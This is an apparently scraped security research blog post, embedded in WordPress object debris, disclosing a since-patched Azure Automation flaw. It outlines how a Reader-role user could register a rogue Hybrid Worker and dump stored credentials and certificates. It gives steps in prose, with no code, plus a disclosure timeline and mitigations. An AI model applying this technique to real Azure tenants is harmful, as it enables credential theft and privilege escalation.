[post_title] => Illogical Apps – Exploring and Exploiting Azure Logic Apps [post_excerpt] => A walk through enumerating and exploiting Azure Logic Apps with varying permissions. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => illogical-apps-exploring-exploiting-azure-logic-apps [to_ping] => [pinged] => [post_modified] => 2021-08-24 15:54:50 [post_modified_gmt] => 2021-08-24 20:54:50 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26244 [menu_order] => 193 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) ) [post_count] => 3 [current_post] => -1 [in_the_loop] => [post] => WP_Post Object ( [ID] => 27649 [post_author] => 98 [post_date] => 2022-04-14 11:30:52 [post_date_gmt] => 2022-04-14 16:30:52 [post_content] =>

The NetSPI team recently discovered a set of issues that allows any Azure user with the Subscription Reader role to dump saved credentials and certificates from Automation Accounts. In cases where Run As accounts were used, this allowed for a Reader to Contributor privilege escalation path.

This is part two of a two-part blog series. In part one, we walked through a privilege escalation scenario by abusing Azure hybrid workers. In this blog, we’ll dig a little deeper and explain how we utilized an undocumented internal API to poll information about the Automation Account (Runbooks, Credentials, Jobs).

Note: The scope of this bug is limited to a subscription. A subscription Reader account is necessary to exploit this bug, and it is not a cross-tenant issue.

Background: Azure Hybrid Worker Groups

The genesis of this research stemmed from studying any potential abuse mechanisms from how Azure Automation handled authenticating Hybrid Worker nodes.

Azure Automation’s core feature is Runbooks, which are pieces of code that can be run on Azure’s Infrastructure or customer-owned Azure Virtual Machines (VMs). These are often used to run scheduled tasks or manage Azure resources. To accomplish this, the runbooks must be authenticated, which can be accomplished through several methods.  

Users can store credentials in Automation Accounts (AA) and access them via Runbooks. Automation Accounts can also use Run As accounts to create a Service Principal that will be used for authentication via a certificate stored in the Automation Account.  

The third option is using Managed Identities, which is what Microsoft is pushing users towards. Managed Identities allow the user to obtain a token at runtime to authenticate and eliminate the issue of stored credentials. The Get-AzPasswords script from the MicroBurst project supports dumping all three kinds of authentication, so long as you have Contributor access.  

Normally, a Runbook is executed in a sandbox on Azure’s infrastructure. However, this comes with certain constraints, namely processing power and execution time. Any long running or resource intensive code may be ill-suited to run in this manner.  

To bridge this gap, Azure offers Hybrid Worker Groups (HWG). HWGs offer users the ability to run Runbooks on their own Azure Virtual Machines, so they can run on more powerful machines for longer.  

Normally, this is accomplished by deploying a Virtual Machine Extension to the desired Virtual Machine to register the Virtual Machine as a HWG node. Then, the user can execute Runbooks on those Hybrid Worker nodes.  

There are also two types of HWGs: User and System. System HWGs are used for Update Management and don’t have the necessary permissions for what we’re interested in, so we’ll be focusing on User HWGs.

The First Set of Issues: Compromising Credentials

We began our research with a registered Hybrid Worker node. When you execute a runbook on the host, the HybridWorkerService process spawns the Orchestrator.Sandbox process. The command line for the latter is as follows.

Next, we focused on MSISecret. At first glance, it appears that the Hybrid Worker node must be able to use this to request an MSI token externally. After reversing the binary, this turned out to be true. 

Every Automation Account has a “Job Runtime Data Service” endpoint, or JRDS, which Hybrid Workers use to poll for jobs and request credentials. You can see the JRDS URL supplied in the command line above. Below is what the full path to request a token looks like in the binary. 

And here you can see this in action.

You can only get that MSI secret after receiving a job from the JRDS endpoint. This can be achieved by polling the /sandboxes endpoint. HWGs handle jobs in a first-come-first-serve fashion, so whichever node polls the endpoint first starts first. By default, nodes will poll every 60 seconds so if polled constantly, then we should almost always beat out the other nodes and get a job with a secret. However, this only works if Runbooks jobs are actively being run through the HWG.

Since we’re able to request Managed Identity tokens, it would make sense that we can request other forms of authentication. A quick grep through of the decompiled binary makes this apparent, and a quick request to these endpoints will yield results. 

The JSON Web Token (JWT) in these requests is for the System Assigned MI of the Virtual Machine, not a management token for Azure.

Requesting all certificates:

We were satisfied with these findings. We figured that this represented an escalation path from Virtual Machine Contributor to Subscription Contributor if Hybrid Worker nodes were in use and reported our findings to Microsoft.

Escalating Our Findings

After we had submitted our report, we found a recently published blog that detailed some of these same ideas, though their thesis was obtaining lateral movement after an administrator pushed a certificate to the Virtual Machine. The author also demonstrated that you could register a new Hybrid Worker node to an Automation Account using the Automation Account key and Log Analytics Workspace key. We wondered if we could abuse this route to escalate the severity of our previous findings.

To read Automation Account keys, a user only needs the Reader role. To exploit this, we hacked up some source code from Microsoft’s Desired State Configuration (DSC) repository.

The repository contained some scripts that are used to register a new Hybrid Worker node, so we bypassed some environment checks and created users/groups that are expected to exist. The registration process looks like this: 

  1. Generate a new self-signed certificate or use an existing one
  2. Create a payload with some details: HWG name, IP address, certificate thumbprint, etc.
  3. Sign the payload with the AA key
  4. Send a PUT request to the AA with all the above info 

This also does not require Hybrid Worker Groups to already be in use; we can supply an arbitrary group name and it will be created. After registering, we can use the certificate and key generated during this process to access the same endpoints that we identified earlier. You also don’t need a Log Analytics workspace key to register because not all AAs are linked to a workspace. 

From start to finish, this exploit works as follows: 

  1. Attacker with Reader access reads the victim Automation Account key
  2. Attacker uses this key to register their own Virtual Machine in their own tenant as a Hybrid Worker node
  3. Attacker can dump any credentials or certificates from the victim AA and use them to authenticate 

We reported this issue to MSRC in a separate report. Below is the timeline for this case: 

  • October 25, 2021: Initial report submitted 
  • December 13, 2021: Second report submitted with details of full privilege escalation 
  • December 31, 2021: $10k bounty awarded 
  • March 14, 2022: Patch is applied 

Microsoft’s Response to the Azure Automation Account Vulnerabilities

After reporting our findings, Microsoft identified the Azure Automation customers vulnerable to this exploit and notified them through the Azure portal. A fix has been rolled out to all customers.

Additionally, Microsoft has updated their documentation with mitigation steps for customers. They’ve updated the Reader role so that it no longer has the ListKeys permission on Automation Accounts and can no longer fetch Automation Account keys. They recommend that customers switch to custom roles if they need a Reader to fetch the Automation Account keys.

Microsoft has also provided the following guidance for deploying Hybrid Workers:

Microsoft recommends installing Hybrid workers using the Hybrid Runbook Worker Virtual Machine extension – without using the automation account keys – for registration of hybrid worker. Microsoft recommends this platform as it leverages a secure Azure AD based authentication mechanism and centralizes the control and management of identities and other resource credentials. Refer to the security best practices for Hybrid worker role.

Conclusion

This issue allowed any user who could read Automation Account keys to extract any credentials or certificates from the affected Automation Account. This issue was not particularly technical or difficult to exploit, and only abused the intended methods for registration and credential retrieval. 

This is a good reminder that even low privileged role assignments such as Reader can have unintended consequences in your cloud environment. 

Want to learn more about cloud penetration testing? Consider registering for NetSPI’s upcoming Dark Side Ops: Azure Cloud Pentesting training or explore our Azure cloud penetration testing service.

[post_title] => Abusing Azure Hybrid Workers for Privilege Escalation – Part 2: An Azure PrivSec Story [post_excerpt] => Discover how an Azure user with the Subscription Reader role can compromise credentials or certificates from Automation Accounts and escalate to a Contributor level role. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => abusing-azure-hybrid-workers-part-2 [to_ping] => [pinged] => [post_modified] => 2022-04-14 11:30:54 [post_modified_gmt] => 2022-04-14 16:30:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27649 [menu_order] => 106 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [comment_count] => 0 [current_comment] => -1 [found_posts] => 3 [max_num_pages] => 0 [max_num_comment_pages] => 0 [is_single] => [is_preview] => [is_page] => [is_archive] => [is_date] => [is_year] => [is_month] => [is_day] => [is_time] => [is_author] => [is_category] => [is_tag] => [is_tax] => [is_search] => [is_feed] => [is_comment_feed] => [is_trackback] => [is_home] => 1 [is_privacy_policy] => [is_404] => [is_embed] => [is_paged] => [is_admin] => [is_attachment] => [is_singular] => [is_robots] => [is_favicon] => [is_posts_page] => [is_post_type_archive] => [query_vars_hash:WP_Query:private] => c054789d938ab30fe605efa73ad93260 [query_vars_changed:WP_Query:private] => [thumbnails_cached] => [allow_query_attachment_by_filename:protected] => [stopwords:WP_Query:private] => [compat_fields:WP_Query:private] => Array ( [0] => query_vars_hash [1] => query_vars_changed ) [compat_methods:WP_Query:private] => Array ( [0] => init_query_flags [1] => parse_tax_query ) )